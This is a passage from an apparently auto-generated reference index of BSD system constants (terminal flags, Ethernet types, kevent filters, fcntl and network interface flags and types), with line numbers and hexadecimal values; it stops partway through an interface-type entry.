DT_UNKNOWN = 0x0 constant ECHO (line 299) | ECHO = 0x8 constant ECHOCTL (line 300) | ECHOCTL = 0x40 constant ECHOE (line 301) | ECHOE = 0x2 constant ECHOK (line 302) | ECHOK = 0x4 constant ECHOKE (line 303) | ECHOKE = 0x1 constant ECHONL (line 304) | ECHONL = 0x10 constant ECHOPRT (line 305) | ECHOPRT = 0x20 constant EMT_TAGOVF (line 306) | EMT_TAGOVF = 0x1 constant EMUL_ENABLED (line 307) | EMUL_ENABLED = 0x1 constant EMUL_NATIVE (line 308) | EMUL_NATIVE = 0x2 constant ENDRUNDISC (line 309) | ENDRUNDISC = 0x9 constant ETH64_8021_RSVD_MASK (line 310) | ETH64_8021_RSVD_MASK = 0xfffffffffff0 constant ETH64_8021_RSVD_PREFIX (line 311) | ETH64_8021_RSVD_PREFIX = 0x180c2000000 constant ETHERMIN (line 312) | ETHERMIN = 0x2e constant ETHERMTU (line 313) | ETHERMTU = 0x5dc constant ETHERTYPE_8023 (line 314) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 315) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 316) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 317) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 318) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 319) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 320) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_AOE (line 321) | ETHERTYPE_AOE = 0x88a2 constant ETHERTYPE_APOLLO (line 322) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 323) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 324) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 325) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 326) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 327) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 328) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 329) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 330) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 331) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 332) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 333) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 334) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 335) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 336) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 337) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 338) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 339) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 340) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 341) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 342) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 343) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 344) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 345) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 346) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 347) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 348) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 349) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 350) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 351) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 352) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 353) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 354) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 355) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 356) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 357) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 358) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 359) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 360) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 361) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 362) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 363) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_EAPOL (line 364) | ETHERTYPE_EAPOL = 0x888e constant ETHERTYPE_ECMA (line 365) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 366) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 367) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 368) | ETHERTYPE_EXCELAN = 0x8010 constant ETHERTYPE_EXPERDATA (line 369) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 370) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 371) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 372) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 373) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 374) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 375) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 376) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 377) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 378) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 379) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 380) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 381) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 382) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 383) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 384) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 385) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 386) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 387) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 388) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 389) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 390) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 391) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 392) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LLDP (line 393) | ETHERTYPE_LLDP = 0x88cc constant ETHERTYPE_LOGICRAFT (line 394) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 395) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MACSEC (line 396) | ETHERTYPE_MACSEC = 0x88e5 constant ETHERTYPE_MATRA (line 397) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 398) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 399) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 400) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 401) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 402) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 403) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 404) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 405) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 406) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 407) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 408) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 409) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 410) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 411) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 412) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 413) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 414) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 415) | ETHERTYPE_NBPDLTE = 0x3c0a constant ETHERTYPE_NBPRAR (line 416) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 417) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 418) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 419) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 420) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 421) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 422) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 423) | ETHERTYPE_NESTAR = 0x8006 constant ETHERTYPE_NETBEUI (line 424) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NHRP (line 425) | ETHERTYPE_NHRP = 0x2001 constant ETHERTYPE_NOVELL (line 426) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 427) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 428) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 429) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NSH (line 430) | ETHERTYPE_NSH = 0x984f constant ETHERTYPE_NTRAILER (line 431) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 432) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 433) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 434) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PBB (line 435) | ETHERTYPE_PBB = 0x88e7 constant ETHERTYPE_PCS (line 436) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 437) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 438) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 439) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 440) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 441) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 442) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 443) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_QINQ (line 444) | ETHERTYPE_QINQ = 0x88a8 constant ETHERTYPE_RACAL (line 445) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 446) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 447) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 448) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 449) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 450) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 451) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 452) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 453) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 454) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 455) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 456) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 457) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 458) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 459) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 460) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOW (line 461) | ETHERTYPE_SLOW = 0x8809 constant ETHERTYPE_SNA (line 462) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 463) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 464) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 465) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 466) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 467) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 468) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 469) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 470) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 471) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 472) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 473) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 474) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 475) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 476) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 477) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 478) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 479) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 480) | ETHERTYPE_UBDL = 0x7000 constant ETHERTYPE_UBNIU (line 481) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 482) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 483) | ETHERTYPE_VALID = 0x1600 constant ETHERTYPE_VARIAN (line 484) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 485) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 486) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 487) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 488) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 489) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 490) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 491) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 492) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 493) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 494) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 495) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 496) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 497) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 498) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 499) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 500) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 501) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 502) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 503) | ETHER_ADDR_LEN = 0x6 constant ETHER_ALIGN (line 504) | ETHER_ALIGN = 0x2 constant ETHER_CRC_LEN (line 505) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 506) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 507) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 508) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_DIX_LEN (line 509) | ETHER_MAX_DIX_LEN = 0x600 constant ETHER_MAX_HARDMTU_LEN (line 510) | ETHER_MAX_HARDMTU_LEN = 0xff9b constant ETHER_MAX_LEN (line 511) | ETHER_MAX_LEN = 0x5ee constant ETHER_MIN_LEN (line 512) | ETHER_MIN_LEN = 0x40 constant ETHER_TYPE_LEN (line 513) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 514) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 515) | EVFILT_AIO = -0x3 constant EVFILT_DEVICE (line 516) | EVFILT_DEVICE = -0x8 constant EVFILT_EXCEPT (line 517) | EVFILT_EXCEPT = -0x9 constant EVFILT_PROC (line 518) | EVFILT_PROC = -0x5 constant EVFILT_READ (line 519) | EVFILT_READ = -0x1 constant EVFILT_SIGNAL (line 520) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 521) | EVFILT_SYSCOUNT = 0x9 constant EVFILT_TIMER (line 522) | EVFILT_TIMER = -0x7 constant EVFILT_VNODE (line 523) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 524) | EVFILT_WRITE = -0x2 constant EVL_ENCAPLEN (line 525) | EVL_ENCAPLEN = 0x4 constant EVL_PRIO_BITS (line 526) | EVL_PRIO_BITS = 0xd constant EVL_PRIO_MAX (line 527) | EVL_PRIO_MAX = 0x7 constant EVL_VLID_MASK (line 528) | EVL_VLID_MASK = 0xfff constant EVL_VLID_MAX (line 529) | EVL_VLID_MAX = 0xffe constant EVL_VLID_MIN (line 530) | EVL_VLID_MIN = 0x1 constant EVL_VLID_NULL (line 531) | EVL_VLID_NULL = 0x0 constant EV_ADD (line 532) | EV_ADD = 0x1 constant EV_CLEAR (line 533) | EV_CLEAR = 0x20 constant EV_DELETE (line 534) | EV_DELETE = 0x2 constant EV_DISABLE (line 535) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 536) | EV_DISPATCH = 0x80 constant EV_ENABLE (line 537) | EV_ENABLE = 0x4 constant EV_EOF (line 538) | EV_EOF = 0x8000 constant EV_ERROR (line 539) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 540) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 541) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 542) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 543) | EV_SYSFLAGS = 0xf800 constant EXTA (line 544) | EXTA = 0x4b00 constant EXTB (line 545) | EXTB = 0x9600 constant EXTPROC (line 546) | EXTPROC = 0x800 constant FD_CLOEXEC (line 547) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 548) | FD_SETSIZE = 0x400 constant FLUSHO (line 549) | FLUSHO = 0x800000 constant F_DUPFD (line 550) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 551) | F_DUPFD_CLOEXEC = 0xa constant F_GETFD (line 552) | F_GETFD = 0x1 constant F_GETFL (line 553) | F_GETFL = 0x3 constant F_GETLK (line 554) | F_GETLK = 0x7 constant F_GETOWN (line 555) | F_GETOWN = 0x5 constant F_ISATTY (line 556) | F_ISATTY = 0xb constant F_OK (line 557) | F_OK = 0x0 constant F_RDLCK (line 558) | F_RDLCK = 0x1 constant F_SETFD (line 559) | F_SETFD = 0x2 constant F_SETFL (line 560) | F_SETFL = 0x4 constant F_SETLK (line 561) | F_SETLK = 0x8 constant F_SETLKW (line 562) | F_SETLKW = 0x9 constant F_SETOWN (line 563) | F_SETOWN = 0x6 constant F_UNLCK (line 564) | F_UNLCK = 0x2 constant F_WRLCK (line 565) | F_WRLCK = 0x3 constant HUPCL (line 566) | HUPCL = 0x4000 constant HW_MACHINE (line 567) | HW_MACHINE = 0x1 constant ICANON (line 568) | ICANON = 0x100 constant ICMP6_FILTER (line 569) | ICMP6_FILTER = 0x12 constant ICRNL (line 570) | ICRNL = 0x100 constant IEXTEN (line 571) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 572) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 573) | IFAN_DEPARTURE = 0x1 constant IFF_ALLMULTI (line 574) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 575) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 576) | IFF_CANTCHANGE = 0x8e52 constant IFF_DEBUG (line 577) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 578) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 579) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 580) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 581) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 582) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 583) | IFF_NOARP = 0x80 constant IFF_OACTIVE (line 584) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 585) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 586) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 587) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 588) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 589) | IFF_STATICARP = 0x20 constant IFF_UP (line 590) | IFF_UP = 0x1 constant IFNAMSIZ (line 591) | IFNAMSIZ = 0x10 constant IFT_1822 (line 592) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 593) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 594) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 595) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 596) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 597) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 598) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 599) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 600) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 601) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 602) | IFT_ASYNC = 0x54 constant IFT_ATM (line 603) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 604) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 605) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 606) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 607) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 608) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 609) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 610) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 611) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 612) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BLUETOOTH (line 613) | IFT_BLUETOOTH = 0xf8 constant IFT_BRIDGE (line 614) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 615) | IFT_BSC = 0x53 constant IFT_CARP (line 616) | IFT_CARP = 0xf7 constant IFT_CCTEMUL (line 617) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 618) | IFT_CEPT = 0x13 constant IFT_CES (line 619) | IFT_CES = 0x85 constant IFT_CHANNEL (line 620) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 621) | IFT_CNR = 0x55 constant IFT_COFFEE (line 622) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 623) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 624) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 625) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 626) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 627) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 628) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 629) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 630) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 631) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 632) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 633) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 634) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 635) | IFT_DS3 = 0x1e constant IFT_DTM (line 636) | IFT_DTM = 0x8c constant IFT_DUMMY (line 637) | IFT_DUMMY = 0xf1 constant IFT_DVBASILN (line 638) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 639) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 640) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 641) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 642) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 643) | IFT_ECONET = 0xce constant IFT_ENC (line 644) | IFT_ENC = 0xf4 constant IFT_EON (line 645) | IFT_EON = 0x19 constant IFT_EPLRS (line 646) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 647) | IFT_ESCON = 0x49 constant IFT_ETHER (line 648) | IFT_ETHER = 0x6 constant IFT_FAITH (line 649) | IFT_FAITH = 0xf3 constant IFT_FAST (line 650) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 651) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 652) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 653) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 654) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 655) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 656) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 657) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 658) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 659) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 660) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 661) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 662) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 663) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 664) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 665) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 666) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 667) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 668) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 669) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 670) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 671) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 672) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 673) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 674) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 675) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 676) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 677) | IFT_HSSI = 0x2e constant IFT_HY (line 678) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 679) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 680) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 681) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 682) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 683) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 684) | 